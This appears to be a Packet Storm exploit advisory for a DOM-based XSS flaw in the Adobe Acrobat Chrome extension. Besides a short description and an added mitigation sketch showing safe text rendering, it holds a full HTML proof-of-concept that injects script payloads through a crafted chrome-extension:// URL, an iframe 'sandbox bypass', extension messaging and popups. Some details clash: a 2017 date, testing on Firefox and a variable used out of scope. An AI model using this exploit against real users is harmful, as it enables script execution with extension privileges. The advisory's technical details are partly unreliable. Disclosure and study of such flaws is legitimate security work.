Description
Adobe Acrobat Chrome extension version 1.41.100 suffers from a cross site scripting vulnerability...
Basic Information
ID: PACKETSTORM:212600
Published: Dec 9, 2025 at 00:00
=============================================================================================================================================
| # Title : Adobe Acrobat Chrome V 1.41.100 Extension DOM XSS Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://chromewebstore.google.com/detail/adobe-acrobat-pdf-edit-co/efaidnbmnnnibpcajpcglclefindmkaj |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/212491/
[+] Summary : The Adobe Acrobat Chrome extension fails to sanitize JSON-based message parameters rendered in the frame.html file. This creates a
DOM-based XSS condition. Malicious payloads are executed inside the extension context.
[+] Date: January 2017
Extension: Adobe Acrobat Chrome Extension (ID: efaidnbmnnnibpcajpcglclefindmkaj)
Type: DOM-based Cross-Site Scripting (XSS)
Users Affected: ~30 million installations (via forced auto-update)
[+] Technical Details:
The extension receives JSON data and renders dynamic HTML without
proper sanitization. The vulnerable code accepts untrusted strings
and injects them into the DOM using innerHTML.
[+] Impact:
An attacker can execute arbitrary JavaScript within the extension
context, bypassing the browser's Same Origin Policy and exercising
extension-level privileges.
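[+] Mitigation sketch (added example, not part of the original advisory and not Adobe's code):
The handler below shows the innerHTML pattern described under Technical Details next to a hardened form that validates the JSON and renders it as text only. The field names come from the payload in this advisory; the function names, allow-list values and length limit are assumptions made for illustration.

```javascript
// Added example: hardened handling of the `message` query parameter.
// Field names come from the advisory's payload; the allow-lists and
// function names are assumptions made for this illustration.
const ALLOWED_OPS = new Set(['status']);
const ALLOWED_STATUS = new Set(['success', 'failure', 'in_progress']);
const MAX_MESSAGE_LEN = 500;

// Parse and validate the untrusted parameter; return null on any violation.
function parseStatusMessage(search) {
  const raw = new URLSearchParams(search).get('message');
  if (raw === null) return null;
  let data;
  try {
    data = JSON.parse(raw);
  } catch (e) {
    return null; // not JSON: reject instead of rendering
  }
  if (typeof data !== 'object' || data === null || Array.isArray(data)) return null;
  if (!ALLOWED_OPS.has(data.panel_op)) return null;
  if (!ALLOWED_STATUS.has(data.current_status)) return null;
  if (typeof data.message !== 'string' || data.message.length > MAX_MESSAGE_LEN) return null;
  return { op: data.panel_op, status: data.current_status, message: data.message };
}

// Vulnerable pattern described in the advisory: markup in `message` is parsed as HTML.
function renderUnsafe(el, msg) {
  el.innerHTML = msg.message;
}

// Hardened pattern: the string is only ever treated as text.
function renderSafe(el, msg) {
  el.textContent = msg.message;
  el.className = 'status-' + msg.status; // value already allow-listed
}

// Escaping for the case where a string must be placed into an HTML template.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Constructed sample input, mirroring the shape of the advisory's payload.
const sample = '?message=' + encodeURIComponent(JSON.stringify({
  panel_op: 'status', current_status: 'failure', message: '<b onclick="x()">hi</b>',
}));
const parsed = parseStatusMessage(sample);
const fakeEl = {}; // stand-in for a DOM element when run under Node
renderSafe(fakeEl, parsed);
console.log(fakeEl.textContent, '|', escapeHtml(parsed.message));
```

With textContent the markup is displayed literally and never parsed, so event-handler attributes and script elements in the string have no effect.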
[+] Exploit (PoC):
The following sanitized PoC demonstrates the XSS trigger behavior.
Steps to Reproduce:
1. Install Adobe Acrobat Chrome Extension.
2. Visit a crafted local HTML page.
3. Observe execution of JavaScript inside the frame context.
Save Instructions:
Code below should be saved in `poc.html` and opened locally.
Execution:
Open `poc.html` in Chrome with the extension installed. Observe
console logs confirming rendering inside the extension's frame.
[+] POC :
<!DOCTYPE html>
<html>
<head>
    <title>Adobe Acrobat XSS Exploit</title>
</head>
<body>
    <h2>Adobe Acrobat Extension DOM XSS Exploit</h2>
    <div id="exploit-container"></div>
    <script>
        // Extension ID and vulnerable page
        const EXTENSION_ID = 'efaidnbmnnnibpcajpcglclefindmkaj';
        const VULNERABLE_PAGE = 'data/js/frame.html';

        function createExploit() {
            // Advanced XSS payload with multiple vectors
            const payload = {
                panel_op: "status",
                current_status: "failure",
                message: `
                    <div style="background:red;color:white;padding:20px;">
                    <h1>XSS EXECUTED</h1>
                    <p>Domain: <script>document.write(document.domain)</script></p>
                    <svg/onload="alert('POC By Indoushka: ' + location.href)">
                    </div>
                    <iframe src="javascript:alert('iframe js')" style="display:none"></iframe>
                `.replace(/\n/g, ' ').trim()
            };
            // URL encode the payload
            const encodedPayload = encodeURIComponent(JSON.stringify(payload));
            const exploitUrl = `chrome-extension://${EXTENSION_ID}/${VULNERABLE_PAGE}?message=${encodedPayload}`;
            return exploitUrl;
        }

        function executeExploit() {
            const exploitUrl = createExploit();
            // Method 1: Try with iframe sandbox bypass
            const iframe = document.createElement('iframe');
            iframe.sandbox = 'allow-scripts allow-same-origin';
            iframe.src = exploitUrl;
            iframe.style.width = "500px";
            iframe.style.height = "400px";
            iframe.style.border = "3px solid red";
            document.getElementById('exploit-container').appendChild(iframe);
            console.log('Exploit URL:', exploitUrl);
            // Method 2: Try to trigger via extension messaging
            setTimeout(() => {
                try {
                    // Try to communicate with the extension
                    chrome.runtime.sendMessage(EXTENSION_ID, {
                        type: 'trefoil_html_convert',
                        data: payload
                    }, response => {
                        console.log('Extension response:', response);
                    });
                } catch(e) {
                    console.log('Direct messaging failed:', e.message);
                }
            }, 1000);
            // Method 3: Create a popup with user gesture
            document.body.onclick = function() {
                window.open(exploitUrl, '_blank', 'width=600,height=400');
            };
        }

        // Execute exploit after page load
        window.onload = executeExploit;
        // Alternative: Use button with user gesture
        document.body.innerHTML += `
            <button onclick="window.open('${createExploit()}', '_blank', 'width=600,height=400')">
            Click to Trigger Exploit (User Gesture Required)
            </button>
        `;
    </script>
</body>
</html>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================